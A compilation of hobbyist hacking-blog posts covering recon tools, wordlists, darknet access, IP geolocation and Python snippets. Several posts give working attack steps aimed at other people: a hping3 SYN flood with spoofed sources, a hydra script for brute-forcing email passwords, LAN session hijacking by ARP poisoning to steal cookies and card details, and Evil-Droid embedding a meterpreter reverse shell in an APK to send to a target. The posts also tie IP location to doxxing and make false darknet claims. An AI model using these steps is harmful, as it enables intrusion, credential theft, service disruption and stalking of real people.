Termux Tutorial: IPtables (Part 2-4 - IPtables usage)

Aye guys, it’s me IRISnoir and made another part of the iptables tutorial. Hope you guys enjoy 🙂

How to use Sniper

welcome to Hacking A Rise i am the laughing man wit another tutorial this time on sniper automated scanner

What is sniper

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information ,
go to find out more

FEATURES

## SN1PER COMMUNITY FEATURES:
– [x] Automatically collects basic recon (ie. whois, ping, DNS, etc.)
– [x] Automatically launches Google hacking queries against a target domain
– [x] Automatically enumerates open ports via NMap port scanning
– [x] Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
– [x] Automatically checks for sub-domain hijacking
– [x] Automatically runs targeted NMap scripts against open ports
– [x] Automatically runs targeted Metasploit scan and exploit modules
– [x] Automatically scans all web applications for common vulnerabilities
– [x] Automatically brute forces ALL open services
– [x] Automatically test for anonymous FTP access
– [x] Automatically runs WPScan, Arachni and Nikto for all web services
– [x] Automatically enumerates NFS shares
– [x] Automatically test for anonymous LDAP access
– [x] Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
– [x] Automatically enumerate SNMP community strings, services and users
– [x] Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
– [x] Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
– [x] Automatically tests for open X11 servers
– [x] Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
– [x] Performs high level enumeration of multiple hosts and subnets
– [x] Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
– [x] Automatically gathers screenshots of all web sites
– [x] Create individual workspaces to store all scan output

## EXPLOITS:
– [x] Drupal RESTful Web Services unserialize() SA-CORE-2019-003
– [x] Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts
– [x] Drupal: CVE-2018-7600: Remote Code Execution – SA-CORE-2018-002
– [x] GPON Routers – Authentication Bypass / Command Injection CVE-2018-10561
– [x] MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
– [x] Apache Tomcat: Remote Code Execution (CVE-2017-12617)
– [x] Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271
– [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
– [x] Apache Struts 2 Framework Checks – REST plugin with XStream handler (CVE-2017-9805)
– [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)
– [x] Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269
– [x] ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249
– [x] Shellshock Bash Shell remote code execution CVE-2014-6271
– [x] HeartBleed OpenSSL Detection CVE-2014-0160
– [x] MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)
– [x] Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843
– [x] MS08-067 Microsoft Server Service Relative Path Stack Corruption
– [x] Webmin File Disclosure CVE-2006-3392
– [x] VsFTPd 2.3.4 Backdoor
– [x] ProFTPd 1.3.3C Backdoor
– [x] MS03-026 Microsoft RPC DCOM Interface Overflow
– [x] DistCC Daemon Command Execution
– [x] JBoss Java De-Serialization
– [x] HTTP Writable Path PUT/DELETE File Access
– [x] Apache Tomcat User Enumeration
– [x] Tomcat Application Manager Login Bruteforce
– [x] Jenkins-CI Enumeration
– [x] HTTP WebDAV Scanner
– [x] Android Insecure ADB
– [x] Anonymous FTP Access
– [x] PHPMyAdmin Backdoor
– [x] PHPMyAdmin Auth Bypass
– [x] OpenSSH User Enumeration
– [x] LibSSH Auth Bypass
– [x] SMTP User Enumeration
– [x] Public NFS Mounts

How to install Sniper

right lads open terminal and type
git clone https://github.com/1N3/Sn1per.git

now type cd Sn1per

now you wanna gave the install.sh promissions to run in the system so type chmod +x install.sh this ./install.sh

(Press Enter )

(let it finish )

How to use Sniper

right since you mead it this far ya didnt brake the pc/laptop hahaha no we cd back to home before and type sniper --help

now lets try a normal scan type sniper -t url

okiedokie lets try a osint scan type sniper -t -o

ok now a recon scan type sniper -t -re

now we are going to try a osint and recon scan on hacking a rise site type sniper -t -o -re

right lads the last one i am going to show ye is the brute in sniper so type sniper -t -b

And the recon osint with brute

heres the rest the commands lads
[*] NORMAL MODE
sniper -t|–target

[*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE
sniper -t|–target -o|–osint -re|–recon -fp|–fullportonly -b|–bruteforce

[*] STEALTH MODE + OSINT + RECON
sniper -t|–target -m|–mode stealth -o|–osint -re|–recon

[*] DISCOVER MODE
sniper -t|–target -m|–mode discover -w|–workspace

[*] FLYOVER MODE
sniper -t|–target -m|–mode flyover -w|–workspace

[*] AIRSTRIKE MODE
sniper -f|–file /full/path/to/targets.txt -m|–mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace

[*] SCAN ONLY SPECIFIC PORT
sniper -t|–target -m port -p|–port

[*] FULLPORTONLY SCAN MODE
sniper -t|–target -fp|–fullportonly

[*] PORT SCAN MODE
sniper -t|–target -m|–mode port -p|–port

[*] WEB MODE – PORT 80 + 443 ONLY!
sniper -t|–target -m|–mode web

[*] HTTP WEB PORT HTTP MODE
sniper -t|–target -m|–mode webporthttp -p|–port

[*] HTTPS WEB PORT HTTPS MODE
sniper -t|–target -m|–mode webporthttps -p|–port

[*] WEBSCAN MODE
sniper -t|–target -m|–mode webscan

[*] ENABLE BRUTEFORCE
sniper -t|–target -b|–bruteforce

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|–target

[*] LOOT REIMPORT FUNCTION
sniper -w –reimport

[*] LOOT REIMPORTALL FUNCTION
sniper -w –reimportall

[*] DELETE WORKSPACE
sniper -w -d

[*] DELETE HOST FROM WORKSPACE
sniper -w -t -dh

[*] SCHEDULED SCANS’
sniper -w -s daily|weekly|monthly’

[*] SCAN STATUS
sniper –status

[*] UPDATE SNIPER
sniper -u|–update

right lads listen hope this comes in handy i will do a video on this in the next coming days so make sure keep a eye on facebook and discord for that and dont forget to sub to the site to be the first to view are posts 🙂

HAPPY HACKING LAUGHINGMAN

Make a program that flips a coin in Python 3

Welcome back to another tutorial, today we will be making a script that flips a coin and randomly selects heads or tails.

To start, make a new python file and name it CoinFlip, once you’ve done that you will need to import the random module. Add the following to the first line of code:

import random

Once you’ve done that you will want to make a string named “coin” and set it equal to a list that includes, “heads” and “tails”. the string should look something like this:

coin = [‘heads’, ‘tails’]

Once you have completed that step only two more to go. You should now be able to print the string coin”
but before you do that you need to make the program select one of the options in the list, to do this enter
the following code:

print(random.choice(coin))

Once that is put into the code, you will now be able to run it and get heads or tails, feel free to run it as
much as you like to make sure it’s random.

I hope you enjoyed today’s tutorial, stay tuned for some more awesome tutorials.

All Code:
import random
coin = [‘heads’, ‘tails’]
print(random.choice(coin))

The harvester

Welcome to hacking a rise hacking a rise I am the Laughingman here with another post this time on getting emails of a domain using harvester this comes in handy for recon so lets get started

What is The Harvester

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.

This is a complete rewrite of the tool with new features like:

Time delays between request
All sources search
Virtual host verifier
Active enumeration (DNS enumeration, Reverse lookups, TLD expansion)
Integration with SHODAN computer database, to get the open ports and banners
Save to XML and HTML
Basic graph with stats
New sources
Source: https://github.com/laramies/theHarvester/
theHarvester Homepage | Kali theHarvester Repo

How to use The Harvester

Right lads using this is so simple a 4 year old can do it so open terminal and type theharester

so befor i show you how to use the tool let me explain the santax of the command -d is the domain of target -l in the ammount emails u wanna find -b is the search engine you want to use there a few you can use with out api like google,bing,yahoo etc …

so in terminal type thehasrvester -d facebook.com -l 100 -d google

lets see what yahoo gaves use the same command agen but add yahoo to the -b

so say you want to save your results well we can as a html file or xml im going to save mine as htmland search with google yahoo and bing so type theharvester -d facebook.com -b google,bing,yahoo -l 50 -f facebookemails.html

what thats going to do see search on google,bing,yahoo for any email related to facebook.com and save to ur root dir as a html file you can view it in the browser by clicking
it

Disclamer

hacking a rise dont take responsibility of any there viewers actions as this purely educational .

there you have it lad simple right till the next one laughingman out

How to dos with Hping3

welcome to hacking a rise I am the one and only Laughingman in this post Im going to show u the basics of Hping3

What is Hping3

Hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols.

What Hping is used for

Test firewall rules
Advanced port scanning
Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
Path MTU discovery
Transferring files between even really fascist firewall rules.
Traceroute-like under different protocols.
Firewalk-like usage.Test firewall rules
Advanced port scanning
Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
Path MTU discovery
Transferring files between even really fascist firewall rules.
Traceroute-like under different protocols.
Firewalk-like usage.

How to use Hping3

lets start with the help menu so type hping3 --help in to terminal

Right lads let start with a simple icmp scan what this dose is send icmp pings to target (icmp stand for its internet control message protocol) so open terminal and type hping3 192.168.8.1

so next we wanna check the tcp packages of the target so what this next command dose is send the icmp ping to port 443 so type hping3 192.168.8.1 -c 10 -p 443 -c is the amount package you want to send to the target -p is the port to send them to

If you wanna look at a more detailed report so type hping3 192.168.8.1 -c 10 -p 443 -V

so now we get to the part you all click on this post to see how to dos with Hping3 WHOOP WHOOP

so open terminal and type
hping3 -S --flood -V 192.168.8.1

-S Sets SYN tcp flag.Which mean you are sending syn packets.

–flood Sends lots of packets and ignore the response.it sends packets as fast as possible.

After few minutes when hping3 floods system with lots of packets he will be forced to quit network.

so say we want to hide were the dos is coming from type this command to terminal
hping3 -S -U --flood --rand-source -V 192.168.8.1

DISCLAMER

dont be a dick head we take no responsibility for any actions taking by are viewers we do not condole any non legal actions as were purely for educational reasons

Thats it lads hope you enjoyed this post make sure the share and check out are discord link in in menu and join use on facebook and twitter dont forget to sub to the blog to be the first to know when a new post is posted all the best lads ~Laughingman

Termux Tutorial: IPtables (Part 2-3 - IPtables usage)

welcome to hacking a rise im X-termux (irisnoir )in this video i show you how to use iptables in termux

Get a location with an IP adress

Get a Location using an IP adress

 

Hey guys ! Lasr here 🙂

Today I’m gonna show you how to get the approximate location of an IP with iplocation.net.

For this tutorial, you will need : A computer/smartphone/tablet with any OS on it, an internet connection and a photo editing software.

SPOILER : you can't get the exact position of someone with such simple tools, if you want his house adress, then make searches on his full name and find his house by his name.

First of all, you need an IP, you can either get it via an IP grabber or via an IP finder (tutorial for a python IP finder here).

Then, go to iplocation.net and put the IP on the text input area on the top (step 1) and click on the “IP Lookup” on the right of the input.

After that, wait until the geolocation data from the three sites below loads. As you can see, we already have 3 locations from the IP; 2 from the same City (Las Vegas) and 1 from New York, why, you might ask, and that’s because the location is closest antenna from the site.

If you just want the country of the guy, then you can stop here, if you want to have his department or his city if you’re lucky enough, then go further.

I will cover 2 techniques :
– the average (better for lines cuz it)
– the triangulation (better for more than 2 points on the map)

1st of, the average, it consists of making the average (thanks captain obvious lmao).
It’s better for 2 points or in some cases when more (when we have points at the start and end of the line but not inside) as in my exemple.

1st Step :
Open this site and put first the latitude in the text input box as shown below. (1)
Then copy the sum (2), open notepad and paste the sum.

Then do the exact same for the Longitude.

2nd Step :

For the 2nd and last step, put the Latitude and Longitude in google maps and see the result.

And boom ! You’re done ! Now let’s get to the 2nd method, the map triangulation.

1st Step :

Open google maps and paste the 1st location, unzoom till you can see the whole country (if the results are from the same country, else unzoom until you can see all of the countries listed on iplocation.net for the IP)
Take a screen, download it, and do the same for all of the other location.

2nd Step :

Then, link all of your results and take the location of the cross made by the lines making a cross.
Red = the 3 locations
Blue = triangulation method
Green = average method

As I said I have a line so this makes this solution not efficient for my case because it’s just a line, and it is a random point in it.

 

If you have a triangle, then make a point in the middle of the 3 lines that you have, and link all of the old points to the new ones as shown below

A, B, C = Location Points

A’, B’, C’ = New Points
F = Point made by the triangulation

If the lines don’t cross and form a triangle, repeat the process.

Hopefully you now know how to find the location of an IP adress ! 🙂

And that’s it, Lasr out !

Darknet part 1

hi and thankyou for joining us to night on darks dark guide to the dark net ( hahaha) for those that get the pun well done!!!! for the other younger members/readers its a pun from hitch hikers guide to the galaxy!!  any way moving on

as the title say’s this is the 1st part of many parts of darknet what is it how to stay safe various ways to access it and maybe one of the last parts will be on how to actually hack the dark net!!!

 

any way todays blog post what ever you wanna call it is just a quick and simple way on actually accessing the dark net i have seen it countless times on fb ” how to access dark net” “what is darknet” and then the scammers jump on it and well you know the story ends!!!

 

first thing first for this guide i am using linux but if you use windows then i will show you the links and dig up some screen shots but basically no matter what OS you use its the same process but Windows you just download the tor browser install and open it simple!!!!

 

ok first thing first quick leture we here at hackingarise do not and will not take any responsibility for any of your actions on the darknet if you get busted then its your own fault this is just a guide only if you decided to actually follow it and well buy something you should’nt and get arrested well basically grow a pair and deal with it simple as

ok now that is over and done with lets get on with it shall we

what is the darknet

well the dark net is quite simply putting it the dark side of the massive world of internet

the dark net/deep web what ever you wanna call it refers to a bunch of networks ( stuff like google bing yahoo) that can’t and will not be indexed on stuff again like google etc eg if you type in “hitman for hire” on google this is what your going to get

litterally a bunch of links that well are telling you about the dark net as for legal reasons you can’t go on the net and say fuck it i am putting a contract on some one today and pay a massive lump sum of money and well everyone is happy!!!

so thats where the darknet now comes in to it BUT be warned darknet is now broken NSA FBI hackers scammers run the darknet so if you look on there and see some paypal accounts and think hmm i can use some extra money becareful as 1 you might be walking in to a scammer page 2 it could be NSA page NO MATTER WHAT COUNTRY YOUR IN THEY WILL ARREST YOU!!! so if you think your govement wont do anything think again NSA do not care they will grab you no matter what

quick guide to what you can actually buy

loaded pay pal accounts

bank account details

guns

drugs

porn

“red room specials”

and trust me when i say this and this part is only for the people who have strong stomach you can hire scientists that basically kidnap people mainly homeless people and preform any formula you send them and they send you hour by hour details of what it does to people and will tweak it until its to how you want

“hitmen”

and well pretty much anything you want

ok how to access it

well first thing first its not something that you can just open like firefox chrome etc you need to take extra procaution as there are things called entry nodes and exit nodes

entry nodes basically put your ip address and everything else in to a bag and send it to the tor servers and then mix it up with millions of others details and makes you “1%” anonymous but these nodes 99% are mixed with payloads from hackers NSA tracers that basically lock on to you the second you log on

exit nodes basically closes the door but there again same as entry nodes so i wont repeat my self on that one

 

1st thing you are going to need which is well the most  important thing possible is a VPN

the only VPN that i personally trust and after doing months of research on this subject and now highly comes recommend is nordvpn

as you can clearly see under netherlands it supports onion servers which means you can access dark net on them if you dont believe me you can try and ask every other vpn service provider but they will say no! simple as that so nordvpn is a high prioty

2nd your going to need a browser called tor which is located here https://www.torproject.org/

windows users just download it

this is what you will be faced with

as you can see just quckly press save and download once downloaded simply head to the download file or where ever you saved it simply right click and hit extract to here

 

you will have two folders the tar file and tor browser

once you opened the tor broweser file you will see these two options quite simply double click ont the blue circle

hit connect

as you can see its now conecting you to the dark net

ok now this is the tor browser never ever on this planet run it full screen this default screen size is good enough plus never download anything always use 10 minute email if you need to sign up to anything always use a different username so nsa can’t pin point you on everything common sense really

anyway your on the dark net just looks like firefox dont it?

wrong type in the search bar on duckduckgo hidden wiki and this is the darknet as you can see everything now ends in .onion

this is one of milliions of links for the dark net as you can see everything you cant find on google is there and everything ends in .onion

well if you want more links then i suggest you either look on darknet just type in .onion links or simply google them as i wont be posting any links

 

well thats all for now stay tuned and i will be doing more later today at some point on various ways of connecting to tor via running 2 virtual machines

 

stay tuned

 

dark

 

Termux Tutorial: IPtables (Part 2-2 - IPtables usage)

welcome to hacking a rise in this video i show u how to set up IP tables

Termux Tutorial: IPtables (Part 2-1 - IPtables usage)

welcome to hacking a rise in this video i show u how to set up IP tables

Termux Tutorial:IPtables (Part 1 - Introduction to IPtables)

This video will teach you how to use IPtables in Termux like a boss

Termux Tutorial: arp-scan and arp-fingerprint

welcome to hacking a rise I am X-termux in this video i show u how to perform a arp scan and fingerprint in termux on android

how to use Crunch

welcome to hacking a rise im the laughingman in this post im going to show you how to make word lists using crunch pre installed on Kali Linux

(Note) this is a outdated method but saying that lads we still use the same way brute forcing and making word-lists always be the same in saying that the method will never change i think dont quote me on it as we never know what going to happen but for now its something to think of the old ways are sometimes the best lol

What is crunch

Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations. Features: crunch generates wordlists in both combination and permutation ways. it can breakup output by number of lines or file size.

Why hackers use password lists

Hackers use password lists to brute things like log ins and wifi password as well as ssh brute so on as we do not know the password we depend on a re wordlists (password lists) to gain the pass to the accounts , ssh etc….

How to use crunch

First we start with the man page this the manual provided but crunch many tools like nmap metasploit etc have manuals to get it type man crunch

now we move on to making a simple word list so in terminal type crunch 4 8 -o /root/Desktop/ this make a world list starting with aaa and end in zzzzzzzz this make a basic word-list with crunch

so lets say we need one for wps we can also make a word list with numbers so in terminal type crunch 1234567890 -o /root/Desktop/

so next we have to look this way right u have a target and u know the charset of the password i mean like say all u know is it has there bday or there kids or there wifes so on we can use crunch to make a word list to have it at the end im be using 2k18 for this type crunch -t @@@@@@2k18 -o /root/Desktop/

right lad now we move on to complex list is the the likes of wpa2 password or if your target has a strong password so to do this we are going to use rainbow tables charsets so type this to the terminal crunch 4 10 -f /usr/share/rainbowtables/charset.txt mixalpha -o /root/Desktop/

Disclamer

this is purely for educational reasons we take no responsibility for you actions or anyone’s actions

right lads there ya go hope ya find it useful in your study’s i am the Laughingman and this was how to use crunch so god bless lads and HAPPY HACKING WHOOP WHOOP

bash make a simple email-bruter

welcome to hacking a rise I’m the Laughingman here to teach ya how to make a simple script for brute forcing emails using hydra it mite work it mite not work but the main thing is you are learning bash so lets go on ….

What is bash

Bash is a Unix shell and command language written by Brian Fox for the GNU Project as a free software replacement for the Bourne shell. First released in 1989, it has been distributed widely as the default login shell for most Linux distributions and Apple’s macOS
FIND OUT MORE HERE

the bash santax we will be using

figlet this will gave use the banner when the script is loaded

echo repeats what ever we type in the ” ”

read this is mostly used with $ to tell your system to read the input user provides it been name age in are case email and world list

writing the script

So open your fav text editor and strat with the frist part the script

#!/bin/bash

then we add figlet for a banner

figlet email-knocker

then are echo commands

echo “hacking a rise ”
echo “mead by laughingman ”
echo “make sure you have your wordlist handy”
echo “Lets go”
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:

now are we add read

read smtp

and the rest

echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist

then we add hydra commands with $ to tell the system to use the email and wordlist we typed in

hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp

now we save it as a .sh file

right to run the file go to were its saves mines in desktop so i go to my desktop and right click open in terminal and type chmod +x emailknocker.sh then ./emailknocker.sh to run it

and it should look something like this

install nethunter on termux

welcome back to hacking a rise in this post im going to show you how to install nethunter the right way in termux with out any errors

what is termux

Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically – additional packages are available using the APT package manager.

what is nethunter

Kali NetHunter is an Android ROM overlay that includes a mobile penetration testing platform. It is officially available for download on newer Nexus devices and the OnePlus One, as well as some Samsung Galaxy models. It also works unofficially on other phones

installing termux

download termux of the playstore here
then install hackers keyboard here

installing nethunter

to install nethunter first type pkg install curl -y
Now copy and paste this to termux
curl -LO https://raw.githubusercontent.com/Hax4us/Nethunter-InTermux/master/kalinethunter


Now type chmod +x kalinethunter
Then ./kalinethunter let it download

Once done type startkali
Then you see root@kali its istallex net we app the keys
So type wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
Then apt install ./kali-archive-keyring_2018.1_all.deb


there ya have it lads just apt-get install kali-linux-full and u got a full kali toolset inside your termux

How to download Github tools to Termux for newcomers

First of all, this tutorial is for newcomers that haven’t used much of Termux. But you can know, Termux’s uniqueness lies inside the fact that there are many repositories with many packages in them. One of them is: ‘git’.

Now, git package is located at the stable-repo, pre-subscribed. No extra repositories needed.

Just use this command to install it:

$ pkg install git

Now, you are ready to go.

Next up, all you need is this command and a Github tool URL.

$ git clone [Insert URL here]

This package is for downloading tools that aren’t in Termux or if you want to downgrade a package.
Also, Hackingarise has a Github account which contains very valuable and helpful tools. You can check it out and download them to your heart’s content. Try it out!

Make an IP finder using python 3

Welcome Everyone, in today’s tutorial I will be teaching you how to make an IP finder using socket in Python.

To start, fire up Pycharm and create a new file for this tutorial I named my file “IP”.
next, we should import the socket module by adding the following to line 1:

Import socket

This allows us to access defines for the socket module.

I usually start my programs with a statement using the input function.

My statement for this program would be “Enter the URL for the site you want the IP of”, to set this as input I would type this:

websiteIP = input("Enter the URL for the site you want the IP of: ")This tells the computer that the string named "websiteIP" is the URL. Now lets find the IP,This is where the socket module comes in, enter the following:

ip = socket.gethostbyname(websiteIPThis tells the computer to find the IP using the string (Where we input the URL) and then attaches itself to the string ip (To make it easier for us to call). After that, type the following:

print("The IP for", websiteIP, "is: ", ip)input("Press Enter to Continue...")This will now print out the ip of the website, I usually add a "Press Enter to Continue" as it makesit easier in the long run when you run it through a terminal.In the end all of your code should look soemthing like this:

import socketwebsiteIP = input("Enter the URL for the site you want the IP of: ")ip = socket.gethostbyname(websiteIP)print("The IP for", websiteIP, "is: ", ip)input("Press Enter to Continue...")Thank you for reading this tutorial, If you have any questions feel free to leave a comment.

Wifiphisher

Welcome to hacking a rise in this one we are going to show you wifiphisher a python script that will help you gain WiFi passwords social media passwords stuff like that

what is wifiphisher

Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malwares.

Wifiphisher is…

…powerful. Wifiphisher can run for hours inside a Raspberry Pi device executing all modern Wi-Fi association techniques (including “Evil Twin”, “KARMA” and “Known Beacons”).

…flexible. Supports dozens of arguments and comes with a set of community-driven phishing templates for different deployment scenarios.

…modular. Users can write simple or complicated modules in Python to expand the functionality of the tool or create custom phishing scenarios in order to conduct specific target-oriented attacks.

…easy to use. Advanced users can utilize the rich set of features that Wifiphisher offers but beginners may start out as simply as “./bin/wifiphisher”. The interactive Textual User Interface guides the tester through the build process of the attack.

…the result of an extensive research. Attacks like “Known Beacons” and “Lure10” as well as state-of-the-art phishing techniques, were disclosed by our developers, and Wifiphisher was the first tool to incorporate them.

…supported by an awesome community of developers and users.

…free. Wifiphisher is available for free download, and also comes with full source code that you may study, change, or distribute under the terms of the GPLv3 license.

how wifiphisher works

Wi-Fi phishing consists of two steps:

The first step involves the process of associating with Wi-Fi clients unknowingly, or in other words, obtaining a man-in-the-middle (MITM) position. Wifiphisher uses a number of different techniques to achieve this including:

Evil Twin, where Wifiphisher creates a fake wireless network that looks similar to a legitimate network.
KARMA, where Wifiphisher masquerades as a public network searched for by nearby Wi-Fi clients.
Known Beacons, where Wifiphisher broadcasts a dictionary of common ESSIDs, that the around wireless stations have likely connected to in the past.
At the same time, Wifiphisher keeps forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations and eventually lure victims using the above techniques.

Performing MiTM attack

(Optionally) There are a number of different attacks that can be carried out once Wifiphisher grants the penetration tester with a man-in-the-middle position. For example, the tester may perform data sniffing or scan the victim stations for vulnerabilities.

Using Wifiphisher, advanced web phishing techniques are possible by gathering information from the target environment and victim user. For example, in one of our scenarios, Wifiphisher will extract information from the broadcasted beacon frames and the HTTP User-Agent header to display a web-based imitation of Windows network manager in order to capture the Pre-Shared Key.

FIND OUT MORE

How to install Wifiphisher

so there is two way to install this on kali type apt-get install wifiphisher -y

or use git hub
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher # Switch to tool’s directory
sudo python setup.py install # Install any dependencies

How to use Wifiphisher

now its installed type wifiphisher -iI wlan1 it will gave you this screen just pick you target press enter

now u picked your target we are going to be asked what method you want to use to gain password

now we with for the target to type there password the script will close as soon as the password is gained

Steganography

Welcome to hacking a rise yes its me laughing man with another yes another post lol in this were and going to talk about Steganography this were you hide a message in plain site the best example i can think of is in prison way the prisoner hide there messages in plan site from the officers this method is easy to remember and easy to so so with much more talk lets start

What is Steganography

Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. The word steganography combines the Greek words steganos, meaning “covered, concealed, or protected”, and graphein meaning “writing”.
find out more here

why we love it

The research also stated that cyber criminals are using Steganography a unique way to spread Payload malware, to infect the targeted systems. … Steganography is a technique used by attackers to hide malicious code within the image that is mainly employed by exploiting kits to hide their malvertising traffic.
Find out more

Getting started

so first of all open your terminal and type apt-get install steghide -y

now we get are files the image and the txt file i have added mine to my Desktop

so cd Desktop and then type steghide embed -ef the text file -cf the image u want two embed it to as you see ive to add steghide embed -ef hideme.txt -cf asds.jpg

boom its done all u need to do is add a passphrase and send it

Now we add want to extract the file out the image so type steghide extract -sf asds.jpg -xf text or were ever you have the image

thanks for reading
LAUGHINGMAN

Session hijacking on lan

Welcome to hacking a rise I’m the Laughing man in this post is to show you session hijacking wile on LAN when i mean LAN this can be a public network or your own i will be using my home network as i dont wanna brake any laws so the tools need is Ettercap,hamster,ferret (thank god most these are install on Kali Linux whoop whoop were is ferret is installed on kali 32 bit only ) this is a handy way to gain password usernames and credit card info
so now lets move on .

What is session hijacking

session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system.

What is ettercap

Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows.
Find out more

What is hamster

It acts as a proxy server that replaces your cookies with session cookies stolen from somebody else, allowing you to hijack their sessions. Cookies are sniffed using the Ferret program.
Find out more

What is ferret

It grabs session cookies that travel across the LAN. Hamster is a proxy that “manipulates” everything grabbed by Ferret.

installing ferret

So im using a 64 bit os of kali so im going have to install ferret as its not installed on kali 64 bit only 32 bit so open terminal and type dpkg --add -architecture i386 && apt-get update && apt install ferret-sidejack:i386 If you have a 32 version of kali skip this step

Starting the attack

So now we can start are attack so go to applications down to sniffing and spoofing

start ettercap pick the interface you want to use since I’m using WiFi I’m picking wlan0 the go to host and scan for hosts click the host list and add them to target or dont now go to mitm and click arp poisoning and click sniff remote connection

Now we load up ferret open a terminal and type ferret -i wlan0

now open a new terminal and start hamster by just typing hamster

Copy the link and pasted it to Firefox

no you see the target to see the cookies click on the ip and it take you to the cookies

Disclimer

listen to me lads
Hacking a rise dose not take responsibility for any actions or harm inflicted by you as this is purely for educational reasons Two show how easy it is for a hacker to gain your password, usernames , credit card info wile on public networks.

hope you enjoyed this lads gud luck and happy hacking

laughing man

Exif Image Recon

Welcome to hacking a rise in this post we talk about exif (Exchangeable image file) this is a the info stored on images (metadata) so here we will show you the command line tool on kali and online tools and firefox plug ins to gain the meta of the image
(note some sites like social media strip out the some the data like gps and this method can be highly actuate with its results form hard and software )

What is Exif

Exchangeable image file (exif) format is a standard that specifies the formats for images, sound, and ancillary tags used by digital cameras, scanners and other systems handling image and sound files recorded by digital cameras,phones etc..

Command line

so if you have a kali system exif tool is install just type exif --help

so say we want to get the info of a image we use exif path to jpeg since i have mine downloaded to desktop i wanna change my dir to desktop so cd Desktop if your image is save there other wise put proper path now i type exif 20190619_001834.jpg

as you can see it gave’s a lot of info like phone type model number
time and date etc …

online tools

http://metapicz.com/#landing

https://www.get-metadata.com

firefox

there few plug in you can install on firefox to help you get the meta of a image

first is exif viewer
Exif viewer

gps-detect
gps-detect

Now lads its not that hard to find info on images as you can see with my top image this can come in handy during a dox but remember social media sites strip all the gud stuff out hahaha

Right god bless

LAUGHINGMAN

Embed apks with Evildroid

welcome to hacking a rise today we are going to show you how to embed a payload to a apk with evildroid this will help with av bypassing on android so lets get started

What is Evildroid

Android Mobile Exploitation with Evil-Droid. … Evil-Droid is a framework that creates & generates & embed apk payload to penetrate Android platforms

using Evildroid

install evil-droid

git clone https://github.com/M4sc3r4n0/Evil-Droid.git
cd Evil-Droid/
chmod +x evil-droid
./evil-droid

now we let it check to see what is installed and to see if anything need to be so let it run for few sec and it will as you to start the framework you click yes and start the services like apache2 and postgersql

now we pick number 3 and it will ask for a ip and then port

now it will ask for a name and then the payload you want to embed I had selected “android/meterpreter/reverse_tcp”

then it will ask u for the file as i picked hackingarise test app

it will now decompile the apk and the paylaod and recompile with the payload embed

now it as you to pick handler i picked multi a its the first one there

then it will open a window and start metasploit

now we go to /root/Evil-Droid/evilapk to get the payload to send to target

DISCLAMER

dont use this for the wrong reasons as this purely for education